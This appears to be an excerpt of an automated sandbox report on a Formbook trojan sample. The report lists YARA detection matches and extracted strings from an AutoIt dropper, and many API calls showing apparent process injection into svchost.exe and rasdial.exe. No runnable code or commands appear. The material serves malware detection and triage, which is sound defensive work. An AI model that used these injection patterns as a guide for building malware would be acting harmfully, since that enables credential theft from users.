            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2033124765.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2032793065.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4129571756.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4130486749.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: This is a third-party compiled AutoIt script.0_2_00683B4C
            Source: 220204-TF1--00.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: 220204-TF1--00.exe, 00000000.00000000.1643043566.0000000000735000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1a4ddbe0-3
            Source: 220204-TF1--00.exe, 00000000.00000000.1643043566.0000000000735000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0222151d-6
            Source: 220204-TF1--00.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_82e61f36-a
            Source: 220204-TF1--00.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0504a556-f
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C1A3 NtClose,1_2_0042C1A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572B60 NtClose,LdrInitializeThunk,1_2_03572B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03572DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03572C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035735C0 NtCreateMutant,LdrInitializeThunk,1_2_035735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03574340 NtSetContextThread,1_2_03574340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03574650 NtSuspendThread,1_2_03574650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572BF0 NtAllocateVirtualMemory,1_2_03572BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572BE0 NtQueryValueKey,1_2_03572BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572B80 NtQueryInformationFile,1_2_03572B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572BA0 NtEnumerateValueKey,1_2_03572BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572AD0 NtReadFile,1_2_03572AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572AF0 NtWriteFile,1_2_03572AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572AB0 NtWaitForSingleObject,1_2_03572AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572F60 NtCreateProcessEx,1_2_03572F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572F30 NtCreateSection,1_2_03572F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572FE0 NtCreateFile,1_2_03572FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572F90 NtProtectVirtualMemory,1_2_03572F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572FB0 NtResumeThread,1_2_03572FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572FA0 NtQuerySection,1_2_03572FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572E30 NtWriteVirtualMemory,1_2_03572E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572EE0 NtQueueApcThread,1_2_03572EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572E80 NtReadVirtualMemory,1_2_03572E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572EA0 NtAdjustPrivilegesToken,1_2_03572EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572D10 NtMapViewOfSection,1_2_03572D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572D00 NtSetInformationFile,1_2_03572D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572D30 NtUnmapViewOfSection,1_2_03572D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572DD0 NtDelayExecution,1_2_03572DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572DB0 NtEnumerateKey,1_2_03572DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572C60 NtCreateKey,1_2_03572C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572C00 NtQueryInformationProcess,1_2_03572C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572CC0 NtQueryVirtualMemory,1_2_03572CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572CF0 NtOpenProcess,1_2_03572CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572CA0 NtQueryInformationToken,1_2_03572CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03573010 NtOpenDirectoryObject,1_2_03573010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03573090 NtSetValueKey,1_2_03573090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035739B0 NtGetContextThread,1_2_035739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03573D70 NtOpenThread,1_2_03573D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03573D10 NtOpenProcessToken,1_2_03573D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F64650 NtSuspendThread,LdrInitializeThunk,6_2_04F64650
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F64340 NtSetContextThread,LdrInitializeThunk,6_2_04F64340
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04F62CA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04F62C70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62C60 NtCreateKey,LdrInitializeThunk,6_2_04F62C60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04F62DF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62DD0 NtDelayExecution,LdrInitializeThunk,6_2_04F62DD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04F62D30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04F62D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04F62EE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04F62E80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62FE0 NtCreateFile,LdrInitializeThunk,6_2_04F62FE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62FB0 NtResumeThread,LdrInitializeThunk,6_2_04F62FB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62F30 NtCreateSection,LdrInitializeThunk,6_2_04F62F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62AF0 NtWriteFile,LdrInitializeThunk,6_2_04F62AF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62AD0 NtReadFile,LdrInitializeThunk,6_2_04F62AD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04F62BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04F62BE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04F62BA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62B60 NtClose,LdrInitializeThunk,6_2_04F62B60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F635C0 NtCreateMutant,LdrInitializeThunk,6_2_04F635C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F639B0 NtGetContextThread,LdrInitializeThunk,6_2_04F639B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62CF0 NtOpenProcess,6_2_04F62CF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62CC0 NtQueryVirtualMemory,6_2_04F62CC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62C00 NtQueryInformationProcess,6_2_04F62C00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62DB0 NtEnumerateKey,6_2_04F62DB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62D00 NtSetInformationFile,6_2_04F62D00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62EA0 NtAdjustPrivilegesToken,6_2_04F62EA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62E30 NtWriteVirtualMemory,6_2_04F62E30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62FA0 NtQuerySection,6_2_04F62FA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62F90 NtProtectVirtualMemory,6_2_04F62F90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62F60 NtCreateProcessEx,6_2_04F62F60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62AB0 NtWaitForSingleObject,6_2_04F62AB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62B80 NtQueryInformationFile,6_2_04F62B80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F63090 NtSetValueKey,6_2_04F63090
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F63010 NtOpenDirectoryObject,6_2_04F63010
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F63D70 NtOpenThread,6_2_04F63D70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F63D10 NtOpenProcessToken,6_2_04F63D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F28FF0 NtDeleteFile,6_2_02F28FF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F28F00 NtReadFile,6_2_02F28F00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F28DA0 NtCreateFile,6_2_02F28DA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F29090 NtClose,6_2_02F29090
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F291E0 NtAllocateVirtualMemory,6_2_02F291E0
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006E4021: CreateFileW,DeviceIoControl,CloseHandle,0_2_006E4021
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006D8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_006D8858
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006E545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_006E545F
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_0068E8000_2_0068E800
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006ADBB50_2_006ADBB5
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_0068FE400_2_0068FE40
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_0068E0600_2_0068E060
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_0070804A0_2_0070804A
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006941400_2_00694140
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006A24050_2_006A2405
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006B65220_2_006B6522
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006B267E0_2_006B267E
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_007006650_2_00700665
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006968430_2_00696843
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006A283A0_2_006A283A
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006B89DF0_2_006B89DF
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_00698A0E0_2_00698A0E
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_00700AE20_2_00700AE2
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006B6A940_2_006B6A94
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006DEB070_2_006DEB07
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006E8B130_2_006E8B13
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006ACD610_2_006ACD61
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006B70060_2_006B7006
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_0069710E0_2_0069710E
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006931900_2_00693190
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006812870_2_00681287
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006A33C70_2_006A33C7
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006AF4190_2_006AF419
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006A16C40_2_006A16C4
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006956800_2_00695680
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006958C00_2_006958C0
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006A78D30_2_006A78D3
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006A1BB80_2_006A1BB8
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006B9D050_2_006B9D05
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006ABFE60_2_006ABFE6
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006A1FD00_2_006A1FD0
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_036836100_2_03683610
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004183631_2_00418363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010CF1_2_004010CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010D01_2_004010D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004029ED1_2_004029ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004029F01_2_004029F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012801_2_00401280
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FC7B1_2_0040FC7B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FC831_2_0040FC83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004165431_2_00416543
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402E901_2_00402E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FEA31_2_0040FEA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042E7431_2_0042E743
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DF231_2_0040DF23
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FA3521_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036003E61_2_036003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E3F01_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E02741_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C02C01_2_035C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C81581_2_035C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DA1181_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035301001_2_03530100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F81CC1_2_035F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036001AA1_2_036001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F41A21_2_035F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D20001_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035647501_2_03564750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035407701_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353C7C01_2_0353C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355C6E01_2_0355C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035405351_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036005911_2_03600591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F24461_2_035F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E44201_2_035E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EE4F61_2_035EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FAB401_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F6BD71_2_035F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA801_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035569621_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360A9A61_2_0360A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A01_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354A8401_2_0354A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035428401_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E8F01_2_0356E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035268B81_2_035268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B4F401_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03560F301_2_03560F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E2F301_2_035E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03582F281_2_03582F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03532FC81_2_03532FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BEFA01_2_035BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540E591_2_03540E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FEE261_2_035FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FEEDB1_2_035FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03552E901_2_03552E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FCE931_2_035FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DCD1F1_2_035DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354AD001_2_0354AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353ADE01_2_0353ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03558DBF1_2_03558DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540C001_2_03540C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530CF21_2_03530CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0CB51_2_035E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352D34C1_2_0352D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F132D1_2_035F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0358739A1_2_0358739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355B2C01_2_0355B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355D2F01_2_0355D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E12ED1_2_035E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035452A01_2_035452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360B16B1_2_0360B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352F1721_2_0352F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357516C1_2_0357516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354B1B01_2_0354B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EF0CC1_2_035EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035470C01_2_035470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F70E91_2_035F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FF0E01_2_035FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FF7B01_2_035FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035856301_2_03585630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F16CC1_2_035F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F75711_2_035F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036095C31_2_036095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DD5B01_2_035DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035314601_2_03531460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FF43F1_2_035FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FFB761_2_035FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B5BF01_2_035B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357DBF91_2_0357DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355FB801_2_0355FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FFA491_2_035FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F7A461_2_035F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B3A6C1_2_035B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EDAC61_2_035EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DDAAC1_2_035DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03585AA01_2_03585AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E1AA31_2_035E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035499501_2_03549950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355B9501_2_0355B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D59101_2_035D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AD8001_2_035AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035438E01_2_035438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FFF091_2_035FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03503FD21_2_03503FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03503FD51_2_03503FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03541F921_2_03541F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FFFB11_2_035FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03549EB01_2_03549EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F1D5A1_2_035F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03543D401_2_03543D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F7D731_2_035F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355FDC01_2_0355FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B9C321_2_035B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FFCF21_2_035FFCF2
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeCode function: 5_2_030AF1085_2_030AF108
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeCode function: 5_2_030AD1885_2_030AD188
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeCode function: 5_2_030CD9A85_2_030CD9A8
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeCode function: 5_2_030B57A85_2_030B57A8
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeCode function: 5_2_030AEEE85_2_030AEEE8
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeCode function: 5_2_030AEEE05_2_030AEEE0
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeCode function: 5_2_030B75C85_2_030B75C8
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FDE4F66_2_04FDE4F6
